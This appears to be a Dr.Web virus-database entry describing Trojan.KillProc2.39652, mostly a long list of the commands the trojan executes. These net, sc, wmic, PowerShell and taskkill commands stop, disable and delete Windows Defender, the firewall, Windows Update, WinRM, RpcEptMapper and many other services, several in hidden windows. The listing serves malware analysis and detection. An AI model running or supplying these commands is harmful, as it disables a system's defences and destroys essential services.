Trojan.KillProc2.39652

Added to the Dr.Web virus database: 2026-02-27

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system, blocks execution of the following system utilities:
  • Windows Update
Executes the following
  • '<SYSTEM32>\taskkill.exe' /f /im SecurityHealthSystray.exe
  • '<SYSTEM32>\net.exe' stop WinDefend /y
  • '<SYSTEM32>\net.exe' stop SecurityHealthService /y
  • '<SYSTEM32>\net.exe' stop WdNisSvc /y
  • '<SYSTEM32>\net.exe' stop MpsSvc /y
  • '<SYSTEM32>\net.exe' stop Sense /y
  • '<SYSTEM32>\net.exe' stop DiagTrack /y
  • '<SYSTEM32>\net.exe' stop WMPNetworkSvc /y
  • '<SYSTEM32>\net.exe' stop RemoteRegistry /y
  • '<SYSTEM32>\net.exe' stop wscsvc /y
  • '<SYSTEM32>\net.exe' stop WinHttpAutoProxySvc /y
  • '<SYSTEM32>\net.exe' stop BITS /y
  • '<SYSTEM32>\net.exe' stop wuauserv /y
  • '<SYSTEM32>\net.exe' stop MSiSCSI /y
  • '<SYSTEM32>\net.exe' stop StorSvc /y
  • '<SYSTEM32>\net.exe' stop DPS /y
  • '<SYSTEM32>\net.exe' stop WdiServiceHost /y
  • '<SYSTEM32>\net.exe' stop WdiSystemHost /y
  • '<SYSTEM32>\net.exe' stop WpnService /y
  • '<SYSTEM32>\net.exe' stop PcaSvc /y
  • '<SYSTEM32>\net.exe' stop SysMain /y
  • '<SYSTEM32>\net.exe' stop WSearch /y
  • '<SYSTEM32>\net.exe' stop WbioSrvc /y
  • '<SYSTEM32>\net.exe' stop WlanSvc /y
  • '<SYSTEM32>\net.exe' stop WwanSvc /y
  • '<SYSTEM32>\net.exe' stop WinRM /y
  • '<SYSTEM32>\net.exe' stop W3SVC /y
  • '<SYSTEM32>\net.exe' stop IISADMIN /y
  • '<SYSTEM32>\net.exe' stop MSMQ /y
  • '<SYSTEM32>\net.exe' stop RpcEptMapper /y
Launches a large number of processes
Terminates or attempts to terminate the following system processes:
  • <SYSTEM32>\securityhealthsystray.exe
Modifies file system
Creates the following files
  • %TEMP%\sysdata.dat
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\sc.exe' stop SecurityHealthSystray.exe
  • '<SYSTEM32>\sc.exe' delete SecurityHealthSystray.exe
  • '<SYSTEM32>\wbem\wmic.exe' process where name='SecurityHealthSystray.exe' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Process -Name 'SecurityHealthSystray.exe' -Force"
  • '<SYSTEM32>\sc.exe' stop WinDefend
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\sc.exe' delete WinDefend
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinDefend' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinDefend'"
  • '<SYSTEM32>\sc.exe' stop SecurityHealthService
  • '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled
  • '<SYSTEM32>\sc.exe' delete SecurityHealthService
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SecurityHealthService' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SecurityHealthService' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SecurityHealthService'"
  • '<SYSTEM32>\sc.exe' stop WdNisSvc
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WdNisSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdNisSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdNisSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdNisSvc'"
  • '<SYSTEM32>\sc.exe' stop MpsSvc
  • '<SYSTEM32>\sc.exe' config MpsSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete MpsSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MpsSvc' -Force"
  • '<SYSTEM32>\net1.exe' stop WinDefend /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MpsSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MpsSvc'"
  • '<SYSTEM32>\sc.exe' stop Sense
  • '<SYSTEM32>\sc.exe' config Sense start= disabled
  • '<SYSTEM32>\sc.exe' delete Sense
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' delete
  • '<SYSTEM32>\net1.exe' stop SecurityHealthService /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'Sense' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'Sense' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'Sense'"
  • '<SYSTEM32>\sc.exe' stop DiagTrack
  • '<SYSTEM32>\sc.exe' config DiagTrack start= disabled
  • '<SYSTEM32>\sc.exe' delete DiagTrack
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DiagTrack' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DiagTrack' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DiagTrack'"
  • '<SYSTEM32>\sc.exe' stop WMPNetworkSvc
  • '<SYSTEM32>\sc.exe' config WMPNetworkSvc start= disabled
  • '<SYSTEM32>\net1.exe' stop WdNisSvc /y
  • '<SYSTEM32>\sc.exe' delete WMPNetworkSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WMPNetworkSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WMPNetworkSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WMPNetworkSvc'"
  • '<SYSTEM32>\sc.exe' stop RemoteRegistry
  • '<SYSTEM32>\sc.exe' config RemoteRegistry start= disabled
  • '<SYSTEM32>\sc.exe' delete RemoteRegistry
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RemoteRegistry' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RemoteRegistry' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RemoteRegistry'"
  • '<SYSTEM32>\sc.exe' stop wscsvc
  • '<SYSTEM32>\sc.exe' config wscsvc start= disabled
  • '<SYSTEM32>\sc.exe' delete wscsvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wscsvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wscsvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wscsvc'"
  • '<SYSTEM32>\sc.exe' stop WinHttpAutoProxySvc
  • '<SYSTEM32>\sc.exe' config WinHttpAutoProxySvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WinHttpAutoProxySvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinHttpAutoProxySvc' -Force"
  • '<SYSTEM32>\net1.exe' stop DiagTrack /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinHttpAutoProxySvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinHttpAutoProxySvc'"
  • '<SYSTEM32>\sc.exe' stop BITS
  • '<SYSTEM32>\sc.exe' config BITS start= disabled
  • '<SYSTEM32>\sc.exe' delete BITS
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'BITS' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'BITS' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'BITS'"
  • '<SYSTEM32>\sc.exe' stop wuauserv
  • '<SYSTEM32>\sc.exe' config wuauserv start= disabled
  • '<SYSTEM32>\sc.exe' delete wuauserv
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wuauserv' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wuauserv' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wuauserv'"
  • '<SYSTEM32>\sc.exe' stop MSiSCSI
  • '<SYSTEM32>\sc.exe' config MSiSCSI start= disabled
  • '<SYSTEM32>\sc.exe' delete MSiSCSI
  • '<SYSTEM32>\net1.exe' stop WMPNetworkSvc /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSiSCSI' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSiSCSI' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSiSCSI'"
  • '<SYSTEM32>\sc.exe' stop StorSvc
  • '<SYSTEM32>\sc.exe' config StorSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete StorSvc
  • '<SYSTEM32>\net1.exe' stop MpsSvc /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'StorSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'StorSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'StorSvc'"
  • '<SYSTEM32>\sc.exe' stop DPS
  • '<SYSTEM32>\sc.exe' config DPS start= disabled
  • '<SYSTEM32>\sc.exe' delete DPS
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DPS' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DPS' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DPS'"
  • '<SYSTEM32>\sc.exe' stop WdiServiceHost
  • '<SYSTEM32>\sc.exe' config WdiServiceHost start= disabled
  • '<SYSTEM32>\sc.exe' delete WdiServiceHost
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiServiceHost' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiServiceHost' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiServiceHost'"
  • '<SYSTEM32>\sc.exe' stop WdiSystemHost
  • '<SYSTEM32>\sc.exe' config WdiSystemHost start= disabled
  • '<SYSTEM32>\sc.exe' delete WdiSystemHost
  • '<SYSTEM32>\net1.exe' stop Sense /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiSystemHost' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiSystemHost' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiSystemHost'"
  • '<SYSTEM32>\sc.exe' stop WpnService
  • '<SYSTEM32>\sc.exe' config WpnService start= disabled
  • '<SYSTEM32>\sc.exe' delete WpnService
  • '<SYSTEM32>\net1.exe' stop wuauserv /y
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WpnService' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WpnService' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WpnService'"
  • '<SYSTEM32>\sc.exe' stop PcaSvc
  • '<SYSTEM32>\sc.exe' config PcaSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete PcaSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'PcaSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'PcaSvc' -StartupType Disabled"
  • '<SYSTEM32>\net1.exe' stop RemoteRegistry /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'PcaSvc'"
  • '<SYSTEM32>\sc.exe' stop SysMain
  • '<SYSTEM32>\sc.exe' config SysMain start= disabled
  • '<SYSTEM32>\sc.exe' delete SysMain
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SysMain' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SysMain' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SysMain'"
  • '<SYSTEM32>\sc.exe' stop WSearch
  • '<SYSTEM32>\sc.exe' config WSearch start= disabled
  • '<SYSTEM32>\sc.exe' delete WSearch
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WSearch' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WSearch' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WSearch'"
  • '<SYSTEM32>\sc.exe' stop WbioSrvc
  • '<SYSTEM32>\sc.exe' config WbioSrvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WbioSrvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WbioSrvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WbioSrvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WbioSrvc'"
  • '<SYSTEM32>\sc.exe' stop WlanSvc
  • '<SYSTEM32>\sc.exe' config WlanSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WlanSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' delete
  • '<SYSTEM32>\net1.exe' stop BITS /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WlanSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WlanSvc' -StartupType Disabled"
  • '<SYSTEM32>\net1.exe' stop StorSvc /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WlanSvc'"
  • '<SYSTEM32>\sc.exe' stop WwanSvc
  • '<SYSTEM32>\sc.exe' config WwanSvc start= disabled
  • '<SYSTEM32>\sc.exe' delete WwanSvc
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WwanSvc' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WwanSvc' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WwanSvc'"
  • '<SYSTEM32>\sc.exe' stop WinRM
  • '<SYSTEM32>\sc.exe' config WinRM start= disabled
  • '<SYSTEM32>\sc.exe' delete WinRM
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinRM' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinRM' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinRM'"
  • '<SYSTEM32>\sc.exe' stop W3SVC
  • '<SYSTEM32>\sc.exe' config W3SVC start= disabled
  • '<SYSTEM32>\sc.exe' delete W3SVC
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'W3SVC' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'W3SVC' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'W3SVC'"
  • '<SYSTEM32>\sc.exe' stop IISADMIN
  • '<SYSTEM32>\sc.exe' config IISADMIN start= disabled
  • '<SYSTEM32>\sc.exe' delete IISADMIN
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'IISADMIN' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'IISADMIN' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'IISADMIN'"
  • '<SYSTEM32>\sc.exe' stop MSMQ
  • '<SYSTEM32>\sc.exe' config MSMQ start= disabled
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSMQ' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSMQ' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSMQ'"
  • '<SYSTEM32>\sc.exe' stop RpcEptMapper
  • '<SYSTEM32>\sc.exe' config RpcEptMapper start= disabled
  • '<SYSTEM32>\sc.exe' delete RpcEptMapper
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' call stopservice
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' delete
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RpcEptMapper' -Force"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RpcEptMapper' -StartupType Disabled"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RpcEptMapper'"
  • '<SYSTEM32>\sc.exe' stop SecurityHealthSystray.exe' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete SecurityHealthSystray.exe' (with hidden window)
  • '<SYSTEM32>\taskkill.exe' /f /im SecurityHealthSystray.exe' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' process where name='SecurityHealthSystray.exe' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Process -Name 'SecurityHealthSystray.exe' -Force"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WinDefend' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WinDefend' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WinDefend /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinDefend' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinDefend' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinDefend'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop SecurityHealthService' (with hidden window)
  • '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete SecurityHealthService' (with hidden window)
  • '<SYSTEM32>\net.exe' stop SecurityHealthService /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SecurityHealthService' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SecurityHealthService' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SecurityHealthService' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SecurityHealthService'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WdNisSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WdNisSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WdNisSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdNisSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdNisSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdNisSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdNisSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop MpsSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config MpsSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete MpsSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop MpsSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MpsSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MpsSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MpsSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MpsSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop Sense' (with hidden window)
  • '<SYSTEM32>\sc.exe' config Sense start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete Sense' (with hidden window)
  • '<SYSTEM32>\net.exe' stop Sense /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='Sense' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'Sense' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'Sense' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'Sense'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop DiagTrack' (with hidden window)
  • '<SYSTEM32>\sc.exe' config DiagTrack start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete DiagTrack' (with hidden window)
  • '<SYSTEM32>\net.exe' stop DiagTrack /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DiagTrack' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DiagTrack' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DiagTrack' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DiagTrack'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WMPNetworkSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WMPNetworkSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WMPNetworkSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WMPNetworkSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WMPNetworkSvc' -Force"' (with hidden window)
